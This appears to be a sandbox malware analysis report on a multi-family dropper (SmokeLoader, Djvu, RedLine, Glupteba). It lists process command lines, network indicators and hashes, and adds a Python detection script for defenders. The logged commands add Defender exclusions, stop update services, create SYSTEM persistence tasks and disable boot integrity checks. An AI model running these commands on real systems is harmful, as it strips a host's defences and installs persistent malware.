Malware Analysis Report

2025-03-15 05:08

Sample ID 231211-mz62rseac6
Target 0x0006000000023234-4438.dat
SHA256 92e52d4a2fcf95b0dd487e49bacfac77ad241f4744f2c6edf670686553c3dec2
Tags
smokeloader djvu redline 55000 @oleh_ps livetraffic up3 backdoor discovery evasion infostealer ransomware themida trojan glupteba dropper loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

92e52d4a2fcf95b0dd487e49bacfac77ad241f4744f2c6edf670686553c3dec2

Threat Level: Known bad

The file 0x0006000000023234-4438.dat was found to be: Known bad.

Malicious Activity Summary

SmokeLoader

RedLine payload

Detected Djvu ransomware

Glupteba

Smokeloader family

Djvu Ransomware

RedLine

Glupteba payload

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Deletes itself

Executes dropped EXE

Themida packer

Modifies file permissions

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-11 10:55

Signatures

Smokeloader family

smokeloader

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-11 10:55

Reported

2023-12-11 10:57

Platform

win7-20231130-en

Max time kernel

30s

Max time network

105s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"

Signatures

Detected Djvu ransomware

Djvu Ransomware

ransomware djvu

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Deletes itself

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\626B.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1388 wrote to memory of 2564 (4 events) N/A N/A C:\Users\Admin\AppData\Local\Temp\626B.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe

"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"

C:\Users\Admin\AppData\Local\Temp\626B.exe

C:\Users\Admin\AppData\Local\Temp\626B.exe

C:\Users\Admin\AppData\Local\Temp\F623.exe

C:\Users\Admin\AppData\Local\Temp\F623.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\is-8A7OE.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8A7OE.tmp\tuc3.tmp" /SL5="$B0118,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\FEEA.exe

C:\Users\Admin\AppData\Local\Temp\FEEA.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231211105617.log C:\Windows\Logs\CBS\CbsPersist_20231211105617.cab

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\5FFE.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\625F.bat" "

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\taskeng.exe

taskeng.exe {7F50F906-4264-4AA5-A52C-2A3365A7527B} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\88AD.exe

C:\Users\Admin\AppData\Local\Temp\88AD.exe

C:\Users\Admin\AppData\Local\Temp\A801.exe

C:\Users\Admin\AppData\Local\Temp\A801.exe

C:\Users\Admin\AppData\Local\Temp\A801.exe

C:\Users\Admin\AppData\Local\Temp\A801.exe

C:\Users\Admin\AppData\Local\Temp\A801.exe

"C:\Users\Admin\AppData\Local\Temp\A801.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\0dc616c6-eb31-4468-86e7-ba6f386b92f4" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\A801.exe

"C:\Users\Admin\AppData\Local\Temp\A801.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\EA4F.exe

C:\Users\Admin\AppData\Local\Temp\EA4F.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\EA4F.exe

C:\Users\Admin\AppData\Local\Temp\EA4F.exe

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\338D.exe

C:\Users\Admin\AppData\Local\Temp\338D.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
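
Detection logic for the command lines above, written for this page as an added example; it is not sandbox output and not code from any of the malware families named in the report. Each rule is a predicate over a single process-creation command line, and the bcdedit commands are folded into one record per boot entry so that the nointegritychecks/kernel combination is flagged as a unit rather than as two unrelated events. The sample input is a subset of the Processes section copied from this report; the rule names, the ATT&CK mappings and the list of system-only binary names are assumptions.

```python
"""Added triage example (not sandbox output): detection rules over the process
command lines in the Processes section above, the shape of data Sysmon Event ID 1
or EDR process-creation telemetry gives you. Rule names, ATT&CK mappings and the
SYSTEM_ONLY list are the author's assumptions."""
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample input: a subset of the command lines from this report.
SAMPLE_CMDLINES: List[str] = [
    r'"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'C:\Windows\rss\csrss.exe',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'sc stop WaaSMedicSvc',
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    r'"C:\Users\Admin\AppData\Local\Temp\A801.exe" --Admin IsNotAutoStart IsNotTask',
    r'icacls "C:\Users\Admin\AppData\Local\0dc616c6-eb31-4468-86e7-ba6f386b92f4" /deny *S-1-1-0:(OI)(CI)(DE,DC)',
    r'C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    r'C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}',
    r'"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231211105617.log C:\Windows\Logs\CBS\CbsPersist_20231211105617.cab',  # routine OS servicing
]

# Core OS process names that only ever run from System32/SysWOW64 (assumed list; extend per estate).
SYSTEM_ONLY = {"csrss.exe", "smss.exe", "lsass.exe", "services.exe", "winlogon.exe", "wininit.exe"}
SYSTEM_DIRS = re.compile(r"^c:\\windows\\(system32|syswow64)\\[^\\]+$", re.I)
# Services whose stop disables Windows Update; the report shows all five being stopped.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
SC_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\w+)", re.I)
BCD_SET = re.compile(r"bcdedit(?:\.exe)?\s+[-/]set\s+(\{[0-9a-f-]+\})\s+(\w+)\s+(.+)$", re.I)


def image_path(cmdline: str) -> str:
    """Executable token at the start of a command line, surrounding quotes removed."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(" ", 1)[0]


def masquerades_system_binary(cmdline: str) -> bool:
    # e.g. C:\Windows\rss\csrss.exe: a core OS process name outside System32.
    path = image_path(cmdline)
    return path.rsplit("\\", 1)[-1].lower() in SYSTEM_ONLY and not SYSTEM_DIRS.match(path)


def stops_update_service(cmdline: str) -> bool:
    """True if any 'sc stop <svc>' in the line (also inside a cmd /c chain) targets an update service."""
    return any(svc.lower() in UPDATE_SERVICES for svc in SC_STOP.findall(cmdline))


RULES: List[Tuple[str, str, Callable[[str], bool]]] = [
    ("firewall_allow_rule_added", "T1562.004",
     lambda c: bool(re.search(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow", c, re.I))),
    ("scheduled_task_onlogon_highest", "T1053.005",
     lambda c: bool(re.search(r"schtasks.*/create.*/sc\s+onlogon.*/rl\s+highest", c, re.I))),
    ("stop_windows_update_services", "T1489", stops_update_service),
    ("defender_exclusion_added", "T1562.001",
     lambda c: bool(re.search(r"Add-MpPreference\s+-ExclusionPath", c, re.I))),
    ("icacls_deny_everyone", "T1222.001",
     lambda c: bool(re.search(r"\bicacls\b.*\s/deny\s+\*S-1-1-0:", c, re.I))),
    ("system_binary_outside_system32", "T1036.005", masquerades_system_binary),
    # STOP/Djvu relaunches its elevated copy with exactly these arguments.
    ("djvu_style_relaunch_flags", "ransomware", lambda c: "--Admin IsNotAutoStart IsNotTask" in c),
]


def triage(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each rule name to the command lines that fired it (rules with no hits are absent)."""
    hits: Dict[str, List[str]] = {}
    for cmd in cmdlines:
        for name, _technique, predicate in RULES:
            if predicate(cmd):
                hits.setdefault(name, []).append(cmd)
    return hits


def bcd_settings(cmdlines: List[str]) -> Dict[str, Dict[str, str]]:
    """Fold a run of 'bcdedit -set {guid} <option> <value>' commands into one dict per boot entry."""
    entries: Dict[str, Dict[str, str]] = {}
    for cmd in cmdlines:
        m = BCD_SET.search(cmd)
        if m:
            guid, option, value = m.groups()
            entries.setdefault(guid.upper(), {})[option.lower()] = value.strip()
    return entries


def suspicious_bcd_entries(cmdlines: List[str]) -> List[str]:
    """Boot entries that turn off loader integrity checks or name their own kernel image.
    nointegritychecks 1 disables the boot loader's signature enforcement, so the dropped
    ntkrnlmp.exe can be loaded as the kernel; this is the sequence the sandbox flags as a
    possible PatchGuard bypass (T1553.006)."""
    return [guid for guid, opts in bcd_settings(cmdlines).items()
            if opts.get("nointegritychecks") == "1" or "kernel" in opts]


if __name__ == "__main__":
    for rule, cmds in triage(SAMPLE_CMDLINES).items():
        print(f"[{rule}] {len(cmds)} hit(s)")
    print("tampered BCD entries:", suspicious_bcd_entries(SAMPLE_CMDLINES))
```

Run as a script to print hit counts per rule. Against real telemetry, feed it the CommandLine field of Sysmon Event ID 1 or the EDR equivalent; the makecab line is kept in the sample as a reminder that CBS log compaction in the same window is routine Windows servicing behaviour and should produce no hit.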

Network

Country Destination Domain Proto
RU 81.19.131.34:80 81.19.131.34 tcp
RU 185.172.128.19:80 185.172.128.19 tcp
RU 77.105.132.87:6731 - tcp
RU 77.105.132.87:6731 - tcp
MD 176.123.7.190:32927 - tcp
US 20.150.70.36:443 - tcp
RU 77.105.132.87:6731 - tcp
RU 212.193.52.24:80 - tcp
RU 212.193.52.24:80 - tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
US 8.8.8.8:53 edarululoom.com udp
US 172.67.167.33:443 edarululoom.com tcp
US 216.239.32.29:80 pki.goog tcp
MX 187.211.38.89:80 - tcp

Files

memory/2972-0-0x0000000000400000-0x000000000040B000-memory.dmp

memory/2972-2-0x0000000000400000-0x000000000040B000-memory.dmp

memory/1388-1-0x0000000002EA0000-0x0000000002EB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\626B.exe

MD5 088aafcffe55242bb9ce1134285978e8
SHA1 520bc5ae4ca00c53bd533f653a93c1747747449c
SHA256 56bd2da50e5cdd6ab826eb419c478c7ed1f28673f0e469be916dd86d96d5aebb
SHA512 8aef2d2787625aea4663e04b7f2e281f48e7aebab8ad2afa4ac1746550a15a2885d7b32240d28ca9eade770d097062f3c0ffe0d2532d3af9c9465dc4299bf5dd

memory/2564-12-0x0000000000080000-0x00000000000BC000-memory.dmp

memory/2564-17-0x0000000074EA0000-0x000000007558E000-memory.dmp

memory/2564-18-0x0000000004D40000-0x0000000004D80000-memory.dmp

memory/2564-20-0x0000000074EA0000-0x000000007558E000-memory.dmp

memory/2564-21-0x0000000004D40000-0x0000000004D80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F623.exe

MD5 8764eade6c88fe85e7e18f0b2fc4241f
SHA1 a68d6826b4d18c35e1cdb7583b2d20fd8f2243b6
SHA256 65ba8b3a5e075135aacfb5d9625b12657b76f65b0e9cb2690ec3a409e459bdd3
SHA512 d5e5058f295a280a5e01f042e59e60b71e72819227a204de1d6608ad494cd531989f6701a50ff7e426949f16124134b27fa5edf435a9f8f5afb6ccdb02b97b52

C:\Users\Admin\AppData\Local\Temp\F623.exe

MD5 8771ccd19b6744e00046c956db08b05e
SHA1 9a0268fd4a588f451ee4975a5556314311951aca
SHA256 61096aaa9339d3e8a773e4085a7e0f7955512c9fc146bc637aa9123adf7ed7be
SHA512 21d9cbaa5cb48c5f9b7ca628a6e53e8c5e36a77bd67eef7cc69022cfca8e8f76d52bda92643be85dd88c2ba665a9c98bbb24aff05662b5e9ac226e4bd0974163

memory/2472-28-0x0000000000B30000-0x0000000001FE6000-memory.dmp

memory/2472-27-0x0000000074EA0000-0x000000007558E000-memory.dmp

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8622aabc7b40bf59c971d220ade39f31
SHA1 5d2bc38c5423c2deffd61682c5ec0aa39aa9702e
SHA256 b8fb049ff16ba93fbc43e55abc51765df17377c953acaeec8e2edff2c320c67d
SHA512 f852e60bf99e23b644de27634e639c92cbf877c5214bb89fb47e23a02598a6ea0d0759f279b99bf2ac3b5ec12c6cb67d21c406466243c509d446ea5b7ce0dcfe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 a56e5e57c1efd20005e7c23542ddf2c5
SHA1 355c4dbe40ea7f636fbc15db814dfdbec6ad055e
SHA256 a35232ded080e84988432be3ca1552dfd8b4278f531fbad6f7bb1824922c9d38
SHA512 fb5609f4f4338cbfd6a3067daeaa934ae16a17c12ff22eb1beea7c1a377214918b58e75596fc7e1cacef887917037217f2a53c04d825eb79cfc85494510320a7

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 ccd86f33fa8dcdd61267a0e7ce488570
SHA1 68aecaccc93039fbc95241af33f624a810569d8e
SHA256 b77105ac220add2ef8d3fc1180fdcf26bb0f14ff3e55b9f02dfe21f6370333ea
SHA512 50a30484efa925cd57ca3bcfcbf1bd9371f39b03fe2b5239797e52e46667935e1b1931d7a349ab2b9bbeb3eddae1cbacbce951677feb63d77b856d0ffb1ee6cb

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 80c2bef60061ba7522aa6a6aa8c46a31
SHA1 54291e88265d93a21fe18f71309c1ec60b3cde07
SHA256 64178454507ef6e0a35d577e6297c04b7ac72e980cd7e74d6cde5d06b056a8e5
SHA512 17f5a9779bd7e08cc66fb33351ce76e75b9b73257f2d838968fba333b48befb453fea075d8e954e1fde01249493a7c7b540d4b9cf749e350a24f0be4254353b3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 0218d2053782ccd3c0f1c60d3d0a9a86
SHA1 18ca669440e1eac03b8ef78eed9c171bced7ea82
SHA256 72b161014fcde37aaf9fc524284ef550ab6f3217a38297ac1e4422be9f3edd33
SHA512 6d61edb4a745c607a55ea6f41233cbf885c45abe2fe7dbdd6bd794defa137e19b4e0c157bab9d7b15d2685bdda7b033593e5958a9440df1be86cb8d6e6d5c52f

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d15b341b65c328ef620fc2bce25f21ea
SHA1 26b1ae8e8e36e1e31f8c05123c168c4788f3dfdf
SHA256 afa7bf8140f406660e55171bb0ae29e31de73c5336f318728d9dcad524cd81e9
SHA512 b6b331b65c5d0027a4f985628c5c42ccaa405d39ad4898282475acc41ebacdd911ecb02e2b246e3bcfc3f83032b33e1c3a4fa53f018b08f7e34accbfaccecfa2

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 930856cfdda9b861c82aad09da078263
SHA1 c026fcfcb6a63233e1890761fd8ee7535ad87a5d
SHA256 d6475e097d14498309aa334d1eeac1fff57ac7e9fc10fbea80e31000ef8fde36
SHA512 013d6b8743ab1cfd602bd0aeacca4bdabf50580c3a3504e60b9aaf0fded61b8d8e4ca3fd18e6178c6f580c5c29e8b47f7248c29adb0e82444b71418b55870f6b

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 4e7185c04ead443201ece07c0a704431
SHA1 86323695d1ead193134e84cc8a4c26601d21b835
SHA256 88f14bf3e51acc0d00c4a1d7e94b2b19637e57b088617d9e1a29c74cea89cb85
SHA512 ef2e16df8cf4fac5d8a8233a03ad05ad803245bcedf704c53c0fecd84fa025b3c1c7e7094d8f608ada486ecf9ac5822e19130f177a61780d41e9c89ac812a7ee

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b4fbf829421d660ba7d5b8d9075784df
SHA1 d59f13ca93eac546fde451048a6586c979f17aa9
SHA256 1a5fcbb4bdbbeadcdf9b6503287e6ac4dc040ea53bee86d2a15be1444e40fa96
SHA512 494f59fdd6088e76d0c9eb8dc17e4f9391dccb6cd6786863b2415ed48575424db36723520a6eea81a7b838ba3cf6fcc839ce3d62e0f54d7fd8dbbbb532c2add3

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 4fe5af04ace0d03a043bedcd25dc541a
SHA1 bcab32fc3444f2130dcbebb36180c0ef5c8aad0c
SHA256 40dd5b782a4a4d82097294b2b67a81900093195198e0880472b9023debbacf41
SHA512 a21e69ebcc1af43a7a5d669867855192ffba1c1839bb55036c5e1387061fd597c5d20f86e7e40d783cd201e568e83eb71cc2afe43bedb015c840ecbe6e7329c4

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 920a55e2510f6569c69067f907364183
SHA1 5d51d14915ea7abd25af7b8106207dc9f08c51bf
SHA256 0b27b42125d515a678a8fb79359baaa559a1960ae601273c12a8888c70ea01ee
SHA512 72ea6edc8138b269006e374b363a437d99ba79c63ede7547f4e6d09501b3034b32f0f54fe995379141baa5cb628a54d82b13f116e4023c6d6bd7f388c9bebc3c

memory/3004-62-0x0000000000400000-0x0000000000414000-memory.dmp

